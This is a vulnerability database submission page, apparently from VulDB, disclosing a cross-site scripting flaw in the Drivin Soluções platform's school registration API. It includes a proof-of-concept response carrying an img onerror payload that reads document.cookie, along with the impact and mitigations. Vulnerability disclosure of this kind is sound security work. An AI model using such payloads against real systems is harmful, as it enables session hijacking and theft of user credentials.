إرسال #509834: Drivin Drivin Soluções NA Cross-Site Scripting via API Response Manipulationالمعلومات

عنوانDrivin Drivin Soluções NA Cross-Site Scripting via API Response Manipulation
الوصفVendor: Drivin Product: Drivin Soluções A Cross-Site Scripting (XSS) vulnerability was identified in the Drivin Soluções platform. The issue arises from improper handling of API responses, where user-controlled input is reflected directly in the front-end without proper sanitization. Request: POST /api/school/registerSchool HTTP/2 Host: X.X.X.X Content-Type: application/json {"name":"bilubiluteteia","code":"123","cnpj":"12.321.321/3213-21","email":"[email protected]","phone":"(12) 3 1231-2312","zipCode":"18053-362","city":"Sorocaba","street":"Rua Almir Muza Soares","district":"Jardim Santa Bárbara","number":"123123","complement":"","state":"SP"} Response: HTTP/2 400 Bad Request Content-Type: application/json {"message":"Escola ja cadastrada!","error":"Escola ja cadastrada!","statusCode":400} POC ---------------- By intercepting the API response and modifying the `message` field, an attacker can inject JavaScript that will execute on the client-side when processed by the front-end. Malicius Request: HTTP/2 400 Bad Request Content-Type: application/json {"message":"<img src onerror=alert(document.cookie)>","error":"Escola ja cadastrada!","statusCode":400} When this response is rendered on the webpage, the JavaScript within the `message` field executes, leading to an XSS attack. Impact: - Theft of authentication cookies and session hijacking. - Potential redirection to malicious websites. - Defacement or unauthorized actions performed on behalf of the victim. Mitigation: - Implement proper output encoding before displaying any user-supplied data. - Use Content Security Policy (CSP) to restrict script execution. - Sanitize API responses before rendering them in the front-end. Classification: - Type: Reflected XSS via API Response Manipulation - CWE: CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
المصدر⚠️ https://github.com/yago3008/cves
المستخدم
 y4g0 (UID 80480)
ارسال26/02/2025 07:52 PM (1 سنة منذ)
الاعتدال15/03/2025 10:27 AM (17 days later)
الحالةتمت الموافقة
إدخال VulDB299800 [Drivin Soluções حتى 20250226 API registerSchool رسالة البرمجة عبر المواقع]
النقاط20

التالي نظرة عامة السابق

Do you need the next level of professionalism?

Upgrade your account now!